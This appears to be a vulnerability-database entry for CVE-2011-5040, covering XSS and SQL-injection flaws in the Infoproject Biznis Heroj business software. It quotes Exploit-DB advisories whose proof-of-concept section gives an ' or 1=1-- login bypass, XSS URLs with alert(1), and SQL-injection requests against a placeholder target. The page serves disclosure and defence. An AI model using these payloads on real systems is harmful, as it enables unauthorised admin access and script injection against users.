CVE-2011-5040
medium
CVSS v3
—
CVSS v4 NEW
—
VIR risk
5.3
Description
Multiple cross-site scripting (XSS) vulnerabilities in Infoproject Biznis Heroj allow remote attackers to inject arbitrary web script or HTML via the config parameter to (1) nalozi_naslov.php and (2) widget.dokumenti_lista.php.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Infoproject Business Hero - Multiple Vulnerabilities
Infoproject Biznis Heroj (login.php) Authentication Bypass Vulnerability
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero (Áèçíèñ Õåðî¼) is the first
software on the Macedonian market that will help you manage your
business processes in your company, such as accounting, production,
acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.
Desc: The vulnerability is caused due to an error in the logon
authentication script (login.php) and can be exploited to bypass
the login procedure by defining the 'username' and 'password' POST
parameters with an SQL Injection attack, gaining admin privileges.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Vendor status:
[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.
Advisory ID: ZSL-2011-5065
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5065.php
14.12.2011
---
PoC:
https://[TARGET]/login.php
Username: ' or 1=1--
Password: ' or 1=1--
Infoproject Biznis Heroj (XSS/SQLi) Multiple Remote Vulnerabilities
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Hero (Áèçíèñ Õåðî¼) is the first
software on the Macedonian market that will help you manage your
business processes in your company, such as accounting, production,
acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.
Desc: Input passed via the parameters 'filter' in 'widget.dokumenti_lista.php'
and 'fin_nalog_id' in 'nalozi_naslov.php' script are not properly sanitised
before being returned to the user or used in SQL queries. This can be exploited
to manipulate SQL queries by injecting arbitrary SQL code. The param 'config'
in 'nalozi_naslov.php' and 'widget.dokumenti_lista.php' is vulnerable to a XSS
issue where the attacker can execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Vendor status:
[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.
Advisory ID: ZSL-2011-5064
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php
14.12.2011
---
XSS:
https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140&config=alert(1);
https://[TARGET]/widgets/widget.dokumenti_lista.php?config=alert(1);&bl=porackakupuvac&framenum=1
SQLi:
- POST https://[TARGET]/widgets/widget.dokumenti_lista.php
action=dok_naslov_lista_sindzir&config=porackakupuvac&grid_strana=celen&
bl=porackakupuvac&magacin_id=1&magacin_config=1&magacin_celen_id=1&magacin_celen_config=1&
magacin_izvoren_id=1&magacin_izvoren_config=1&dokument_tip_id=PORACKAKUPUVACML&
dokument_tip_config=PORACKAKUPUVACML&dokument_tip_celen_id=PORACKAKUPUVACML&
dokument_tip_celen_config=PORACKAKUPUVACML&dokument_tip_izvoren_id=PORACKAKUPUVACML&
dokument_tip_izvoren_config=PORACKAKUPUVACML&dokument_tip_sleden_id=NALOGISPORAKA&
order=dok_naslov.datum_dokument desc, dok_naslov.sifra desc &
filter=dok_naslov.datum_dokument between '2011-11-15' and '2011-12-15'&offset=&
limit=50&widget=1
- GET https://[TARGET]/prg_finansovo/nalozi_naslov.php?fin_nalog_id=140[SQLi]&config=defaultApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| infoproject | biznis_heroj | | |
References
- http://www.exploit-db.com/exploits/18259
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71928
- http://www.exploit-db.com/exploits/18259
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5064.php
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71928
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.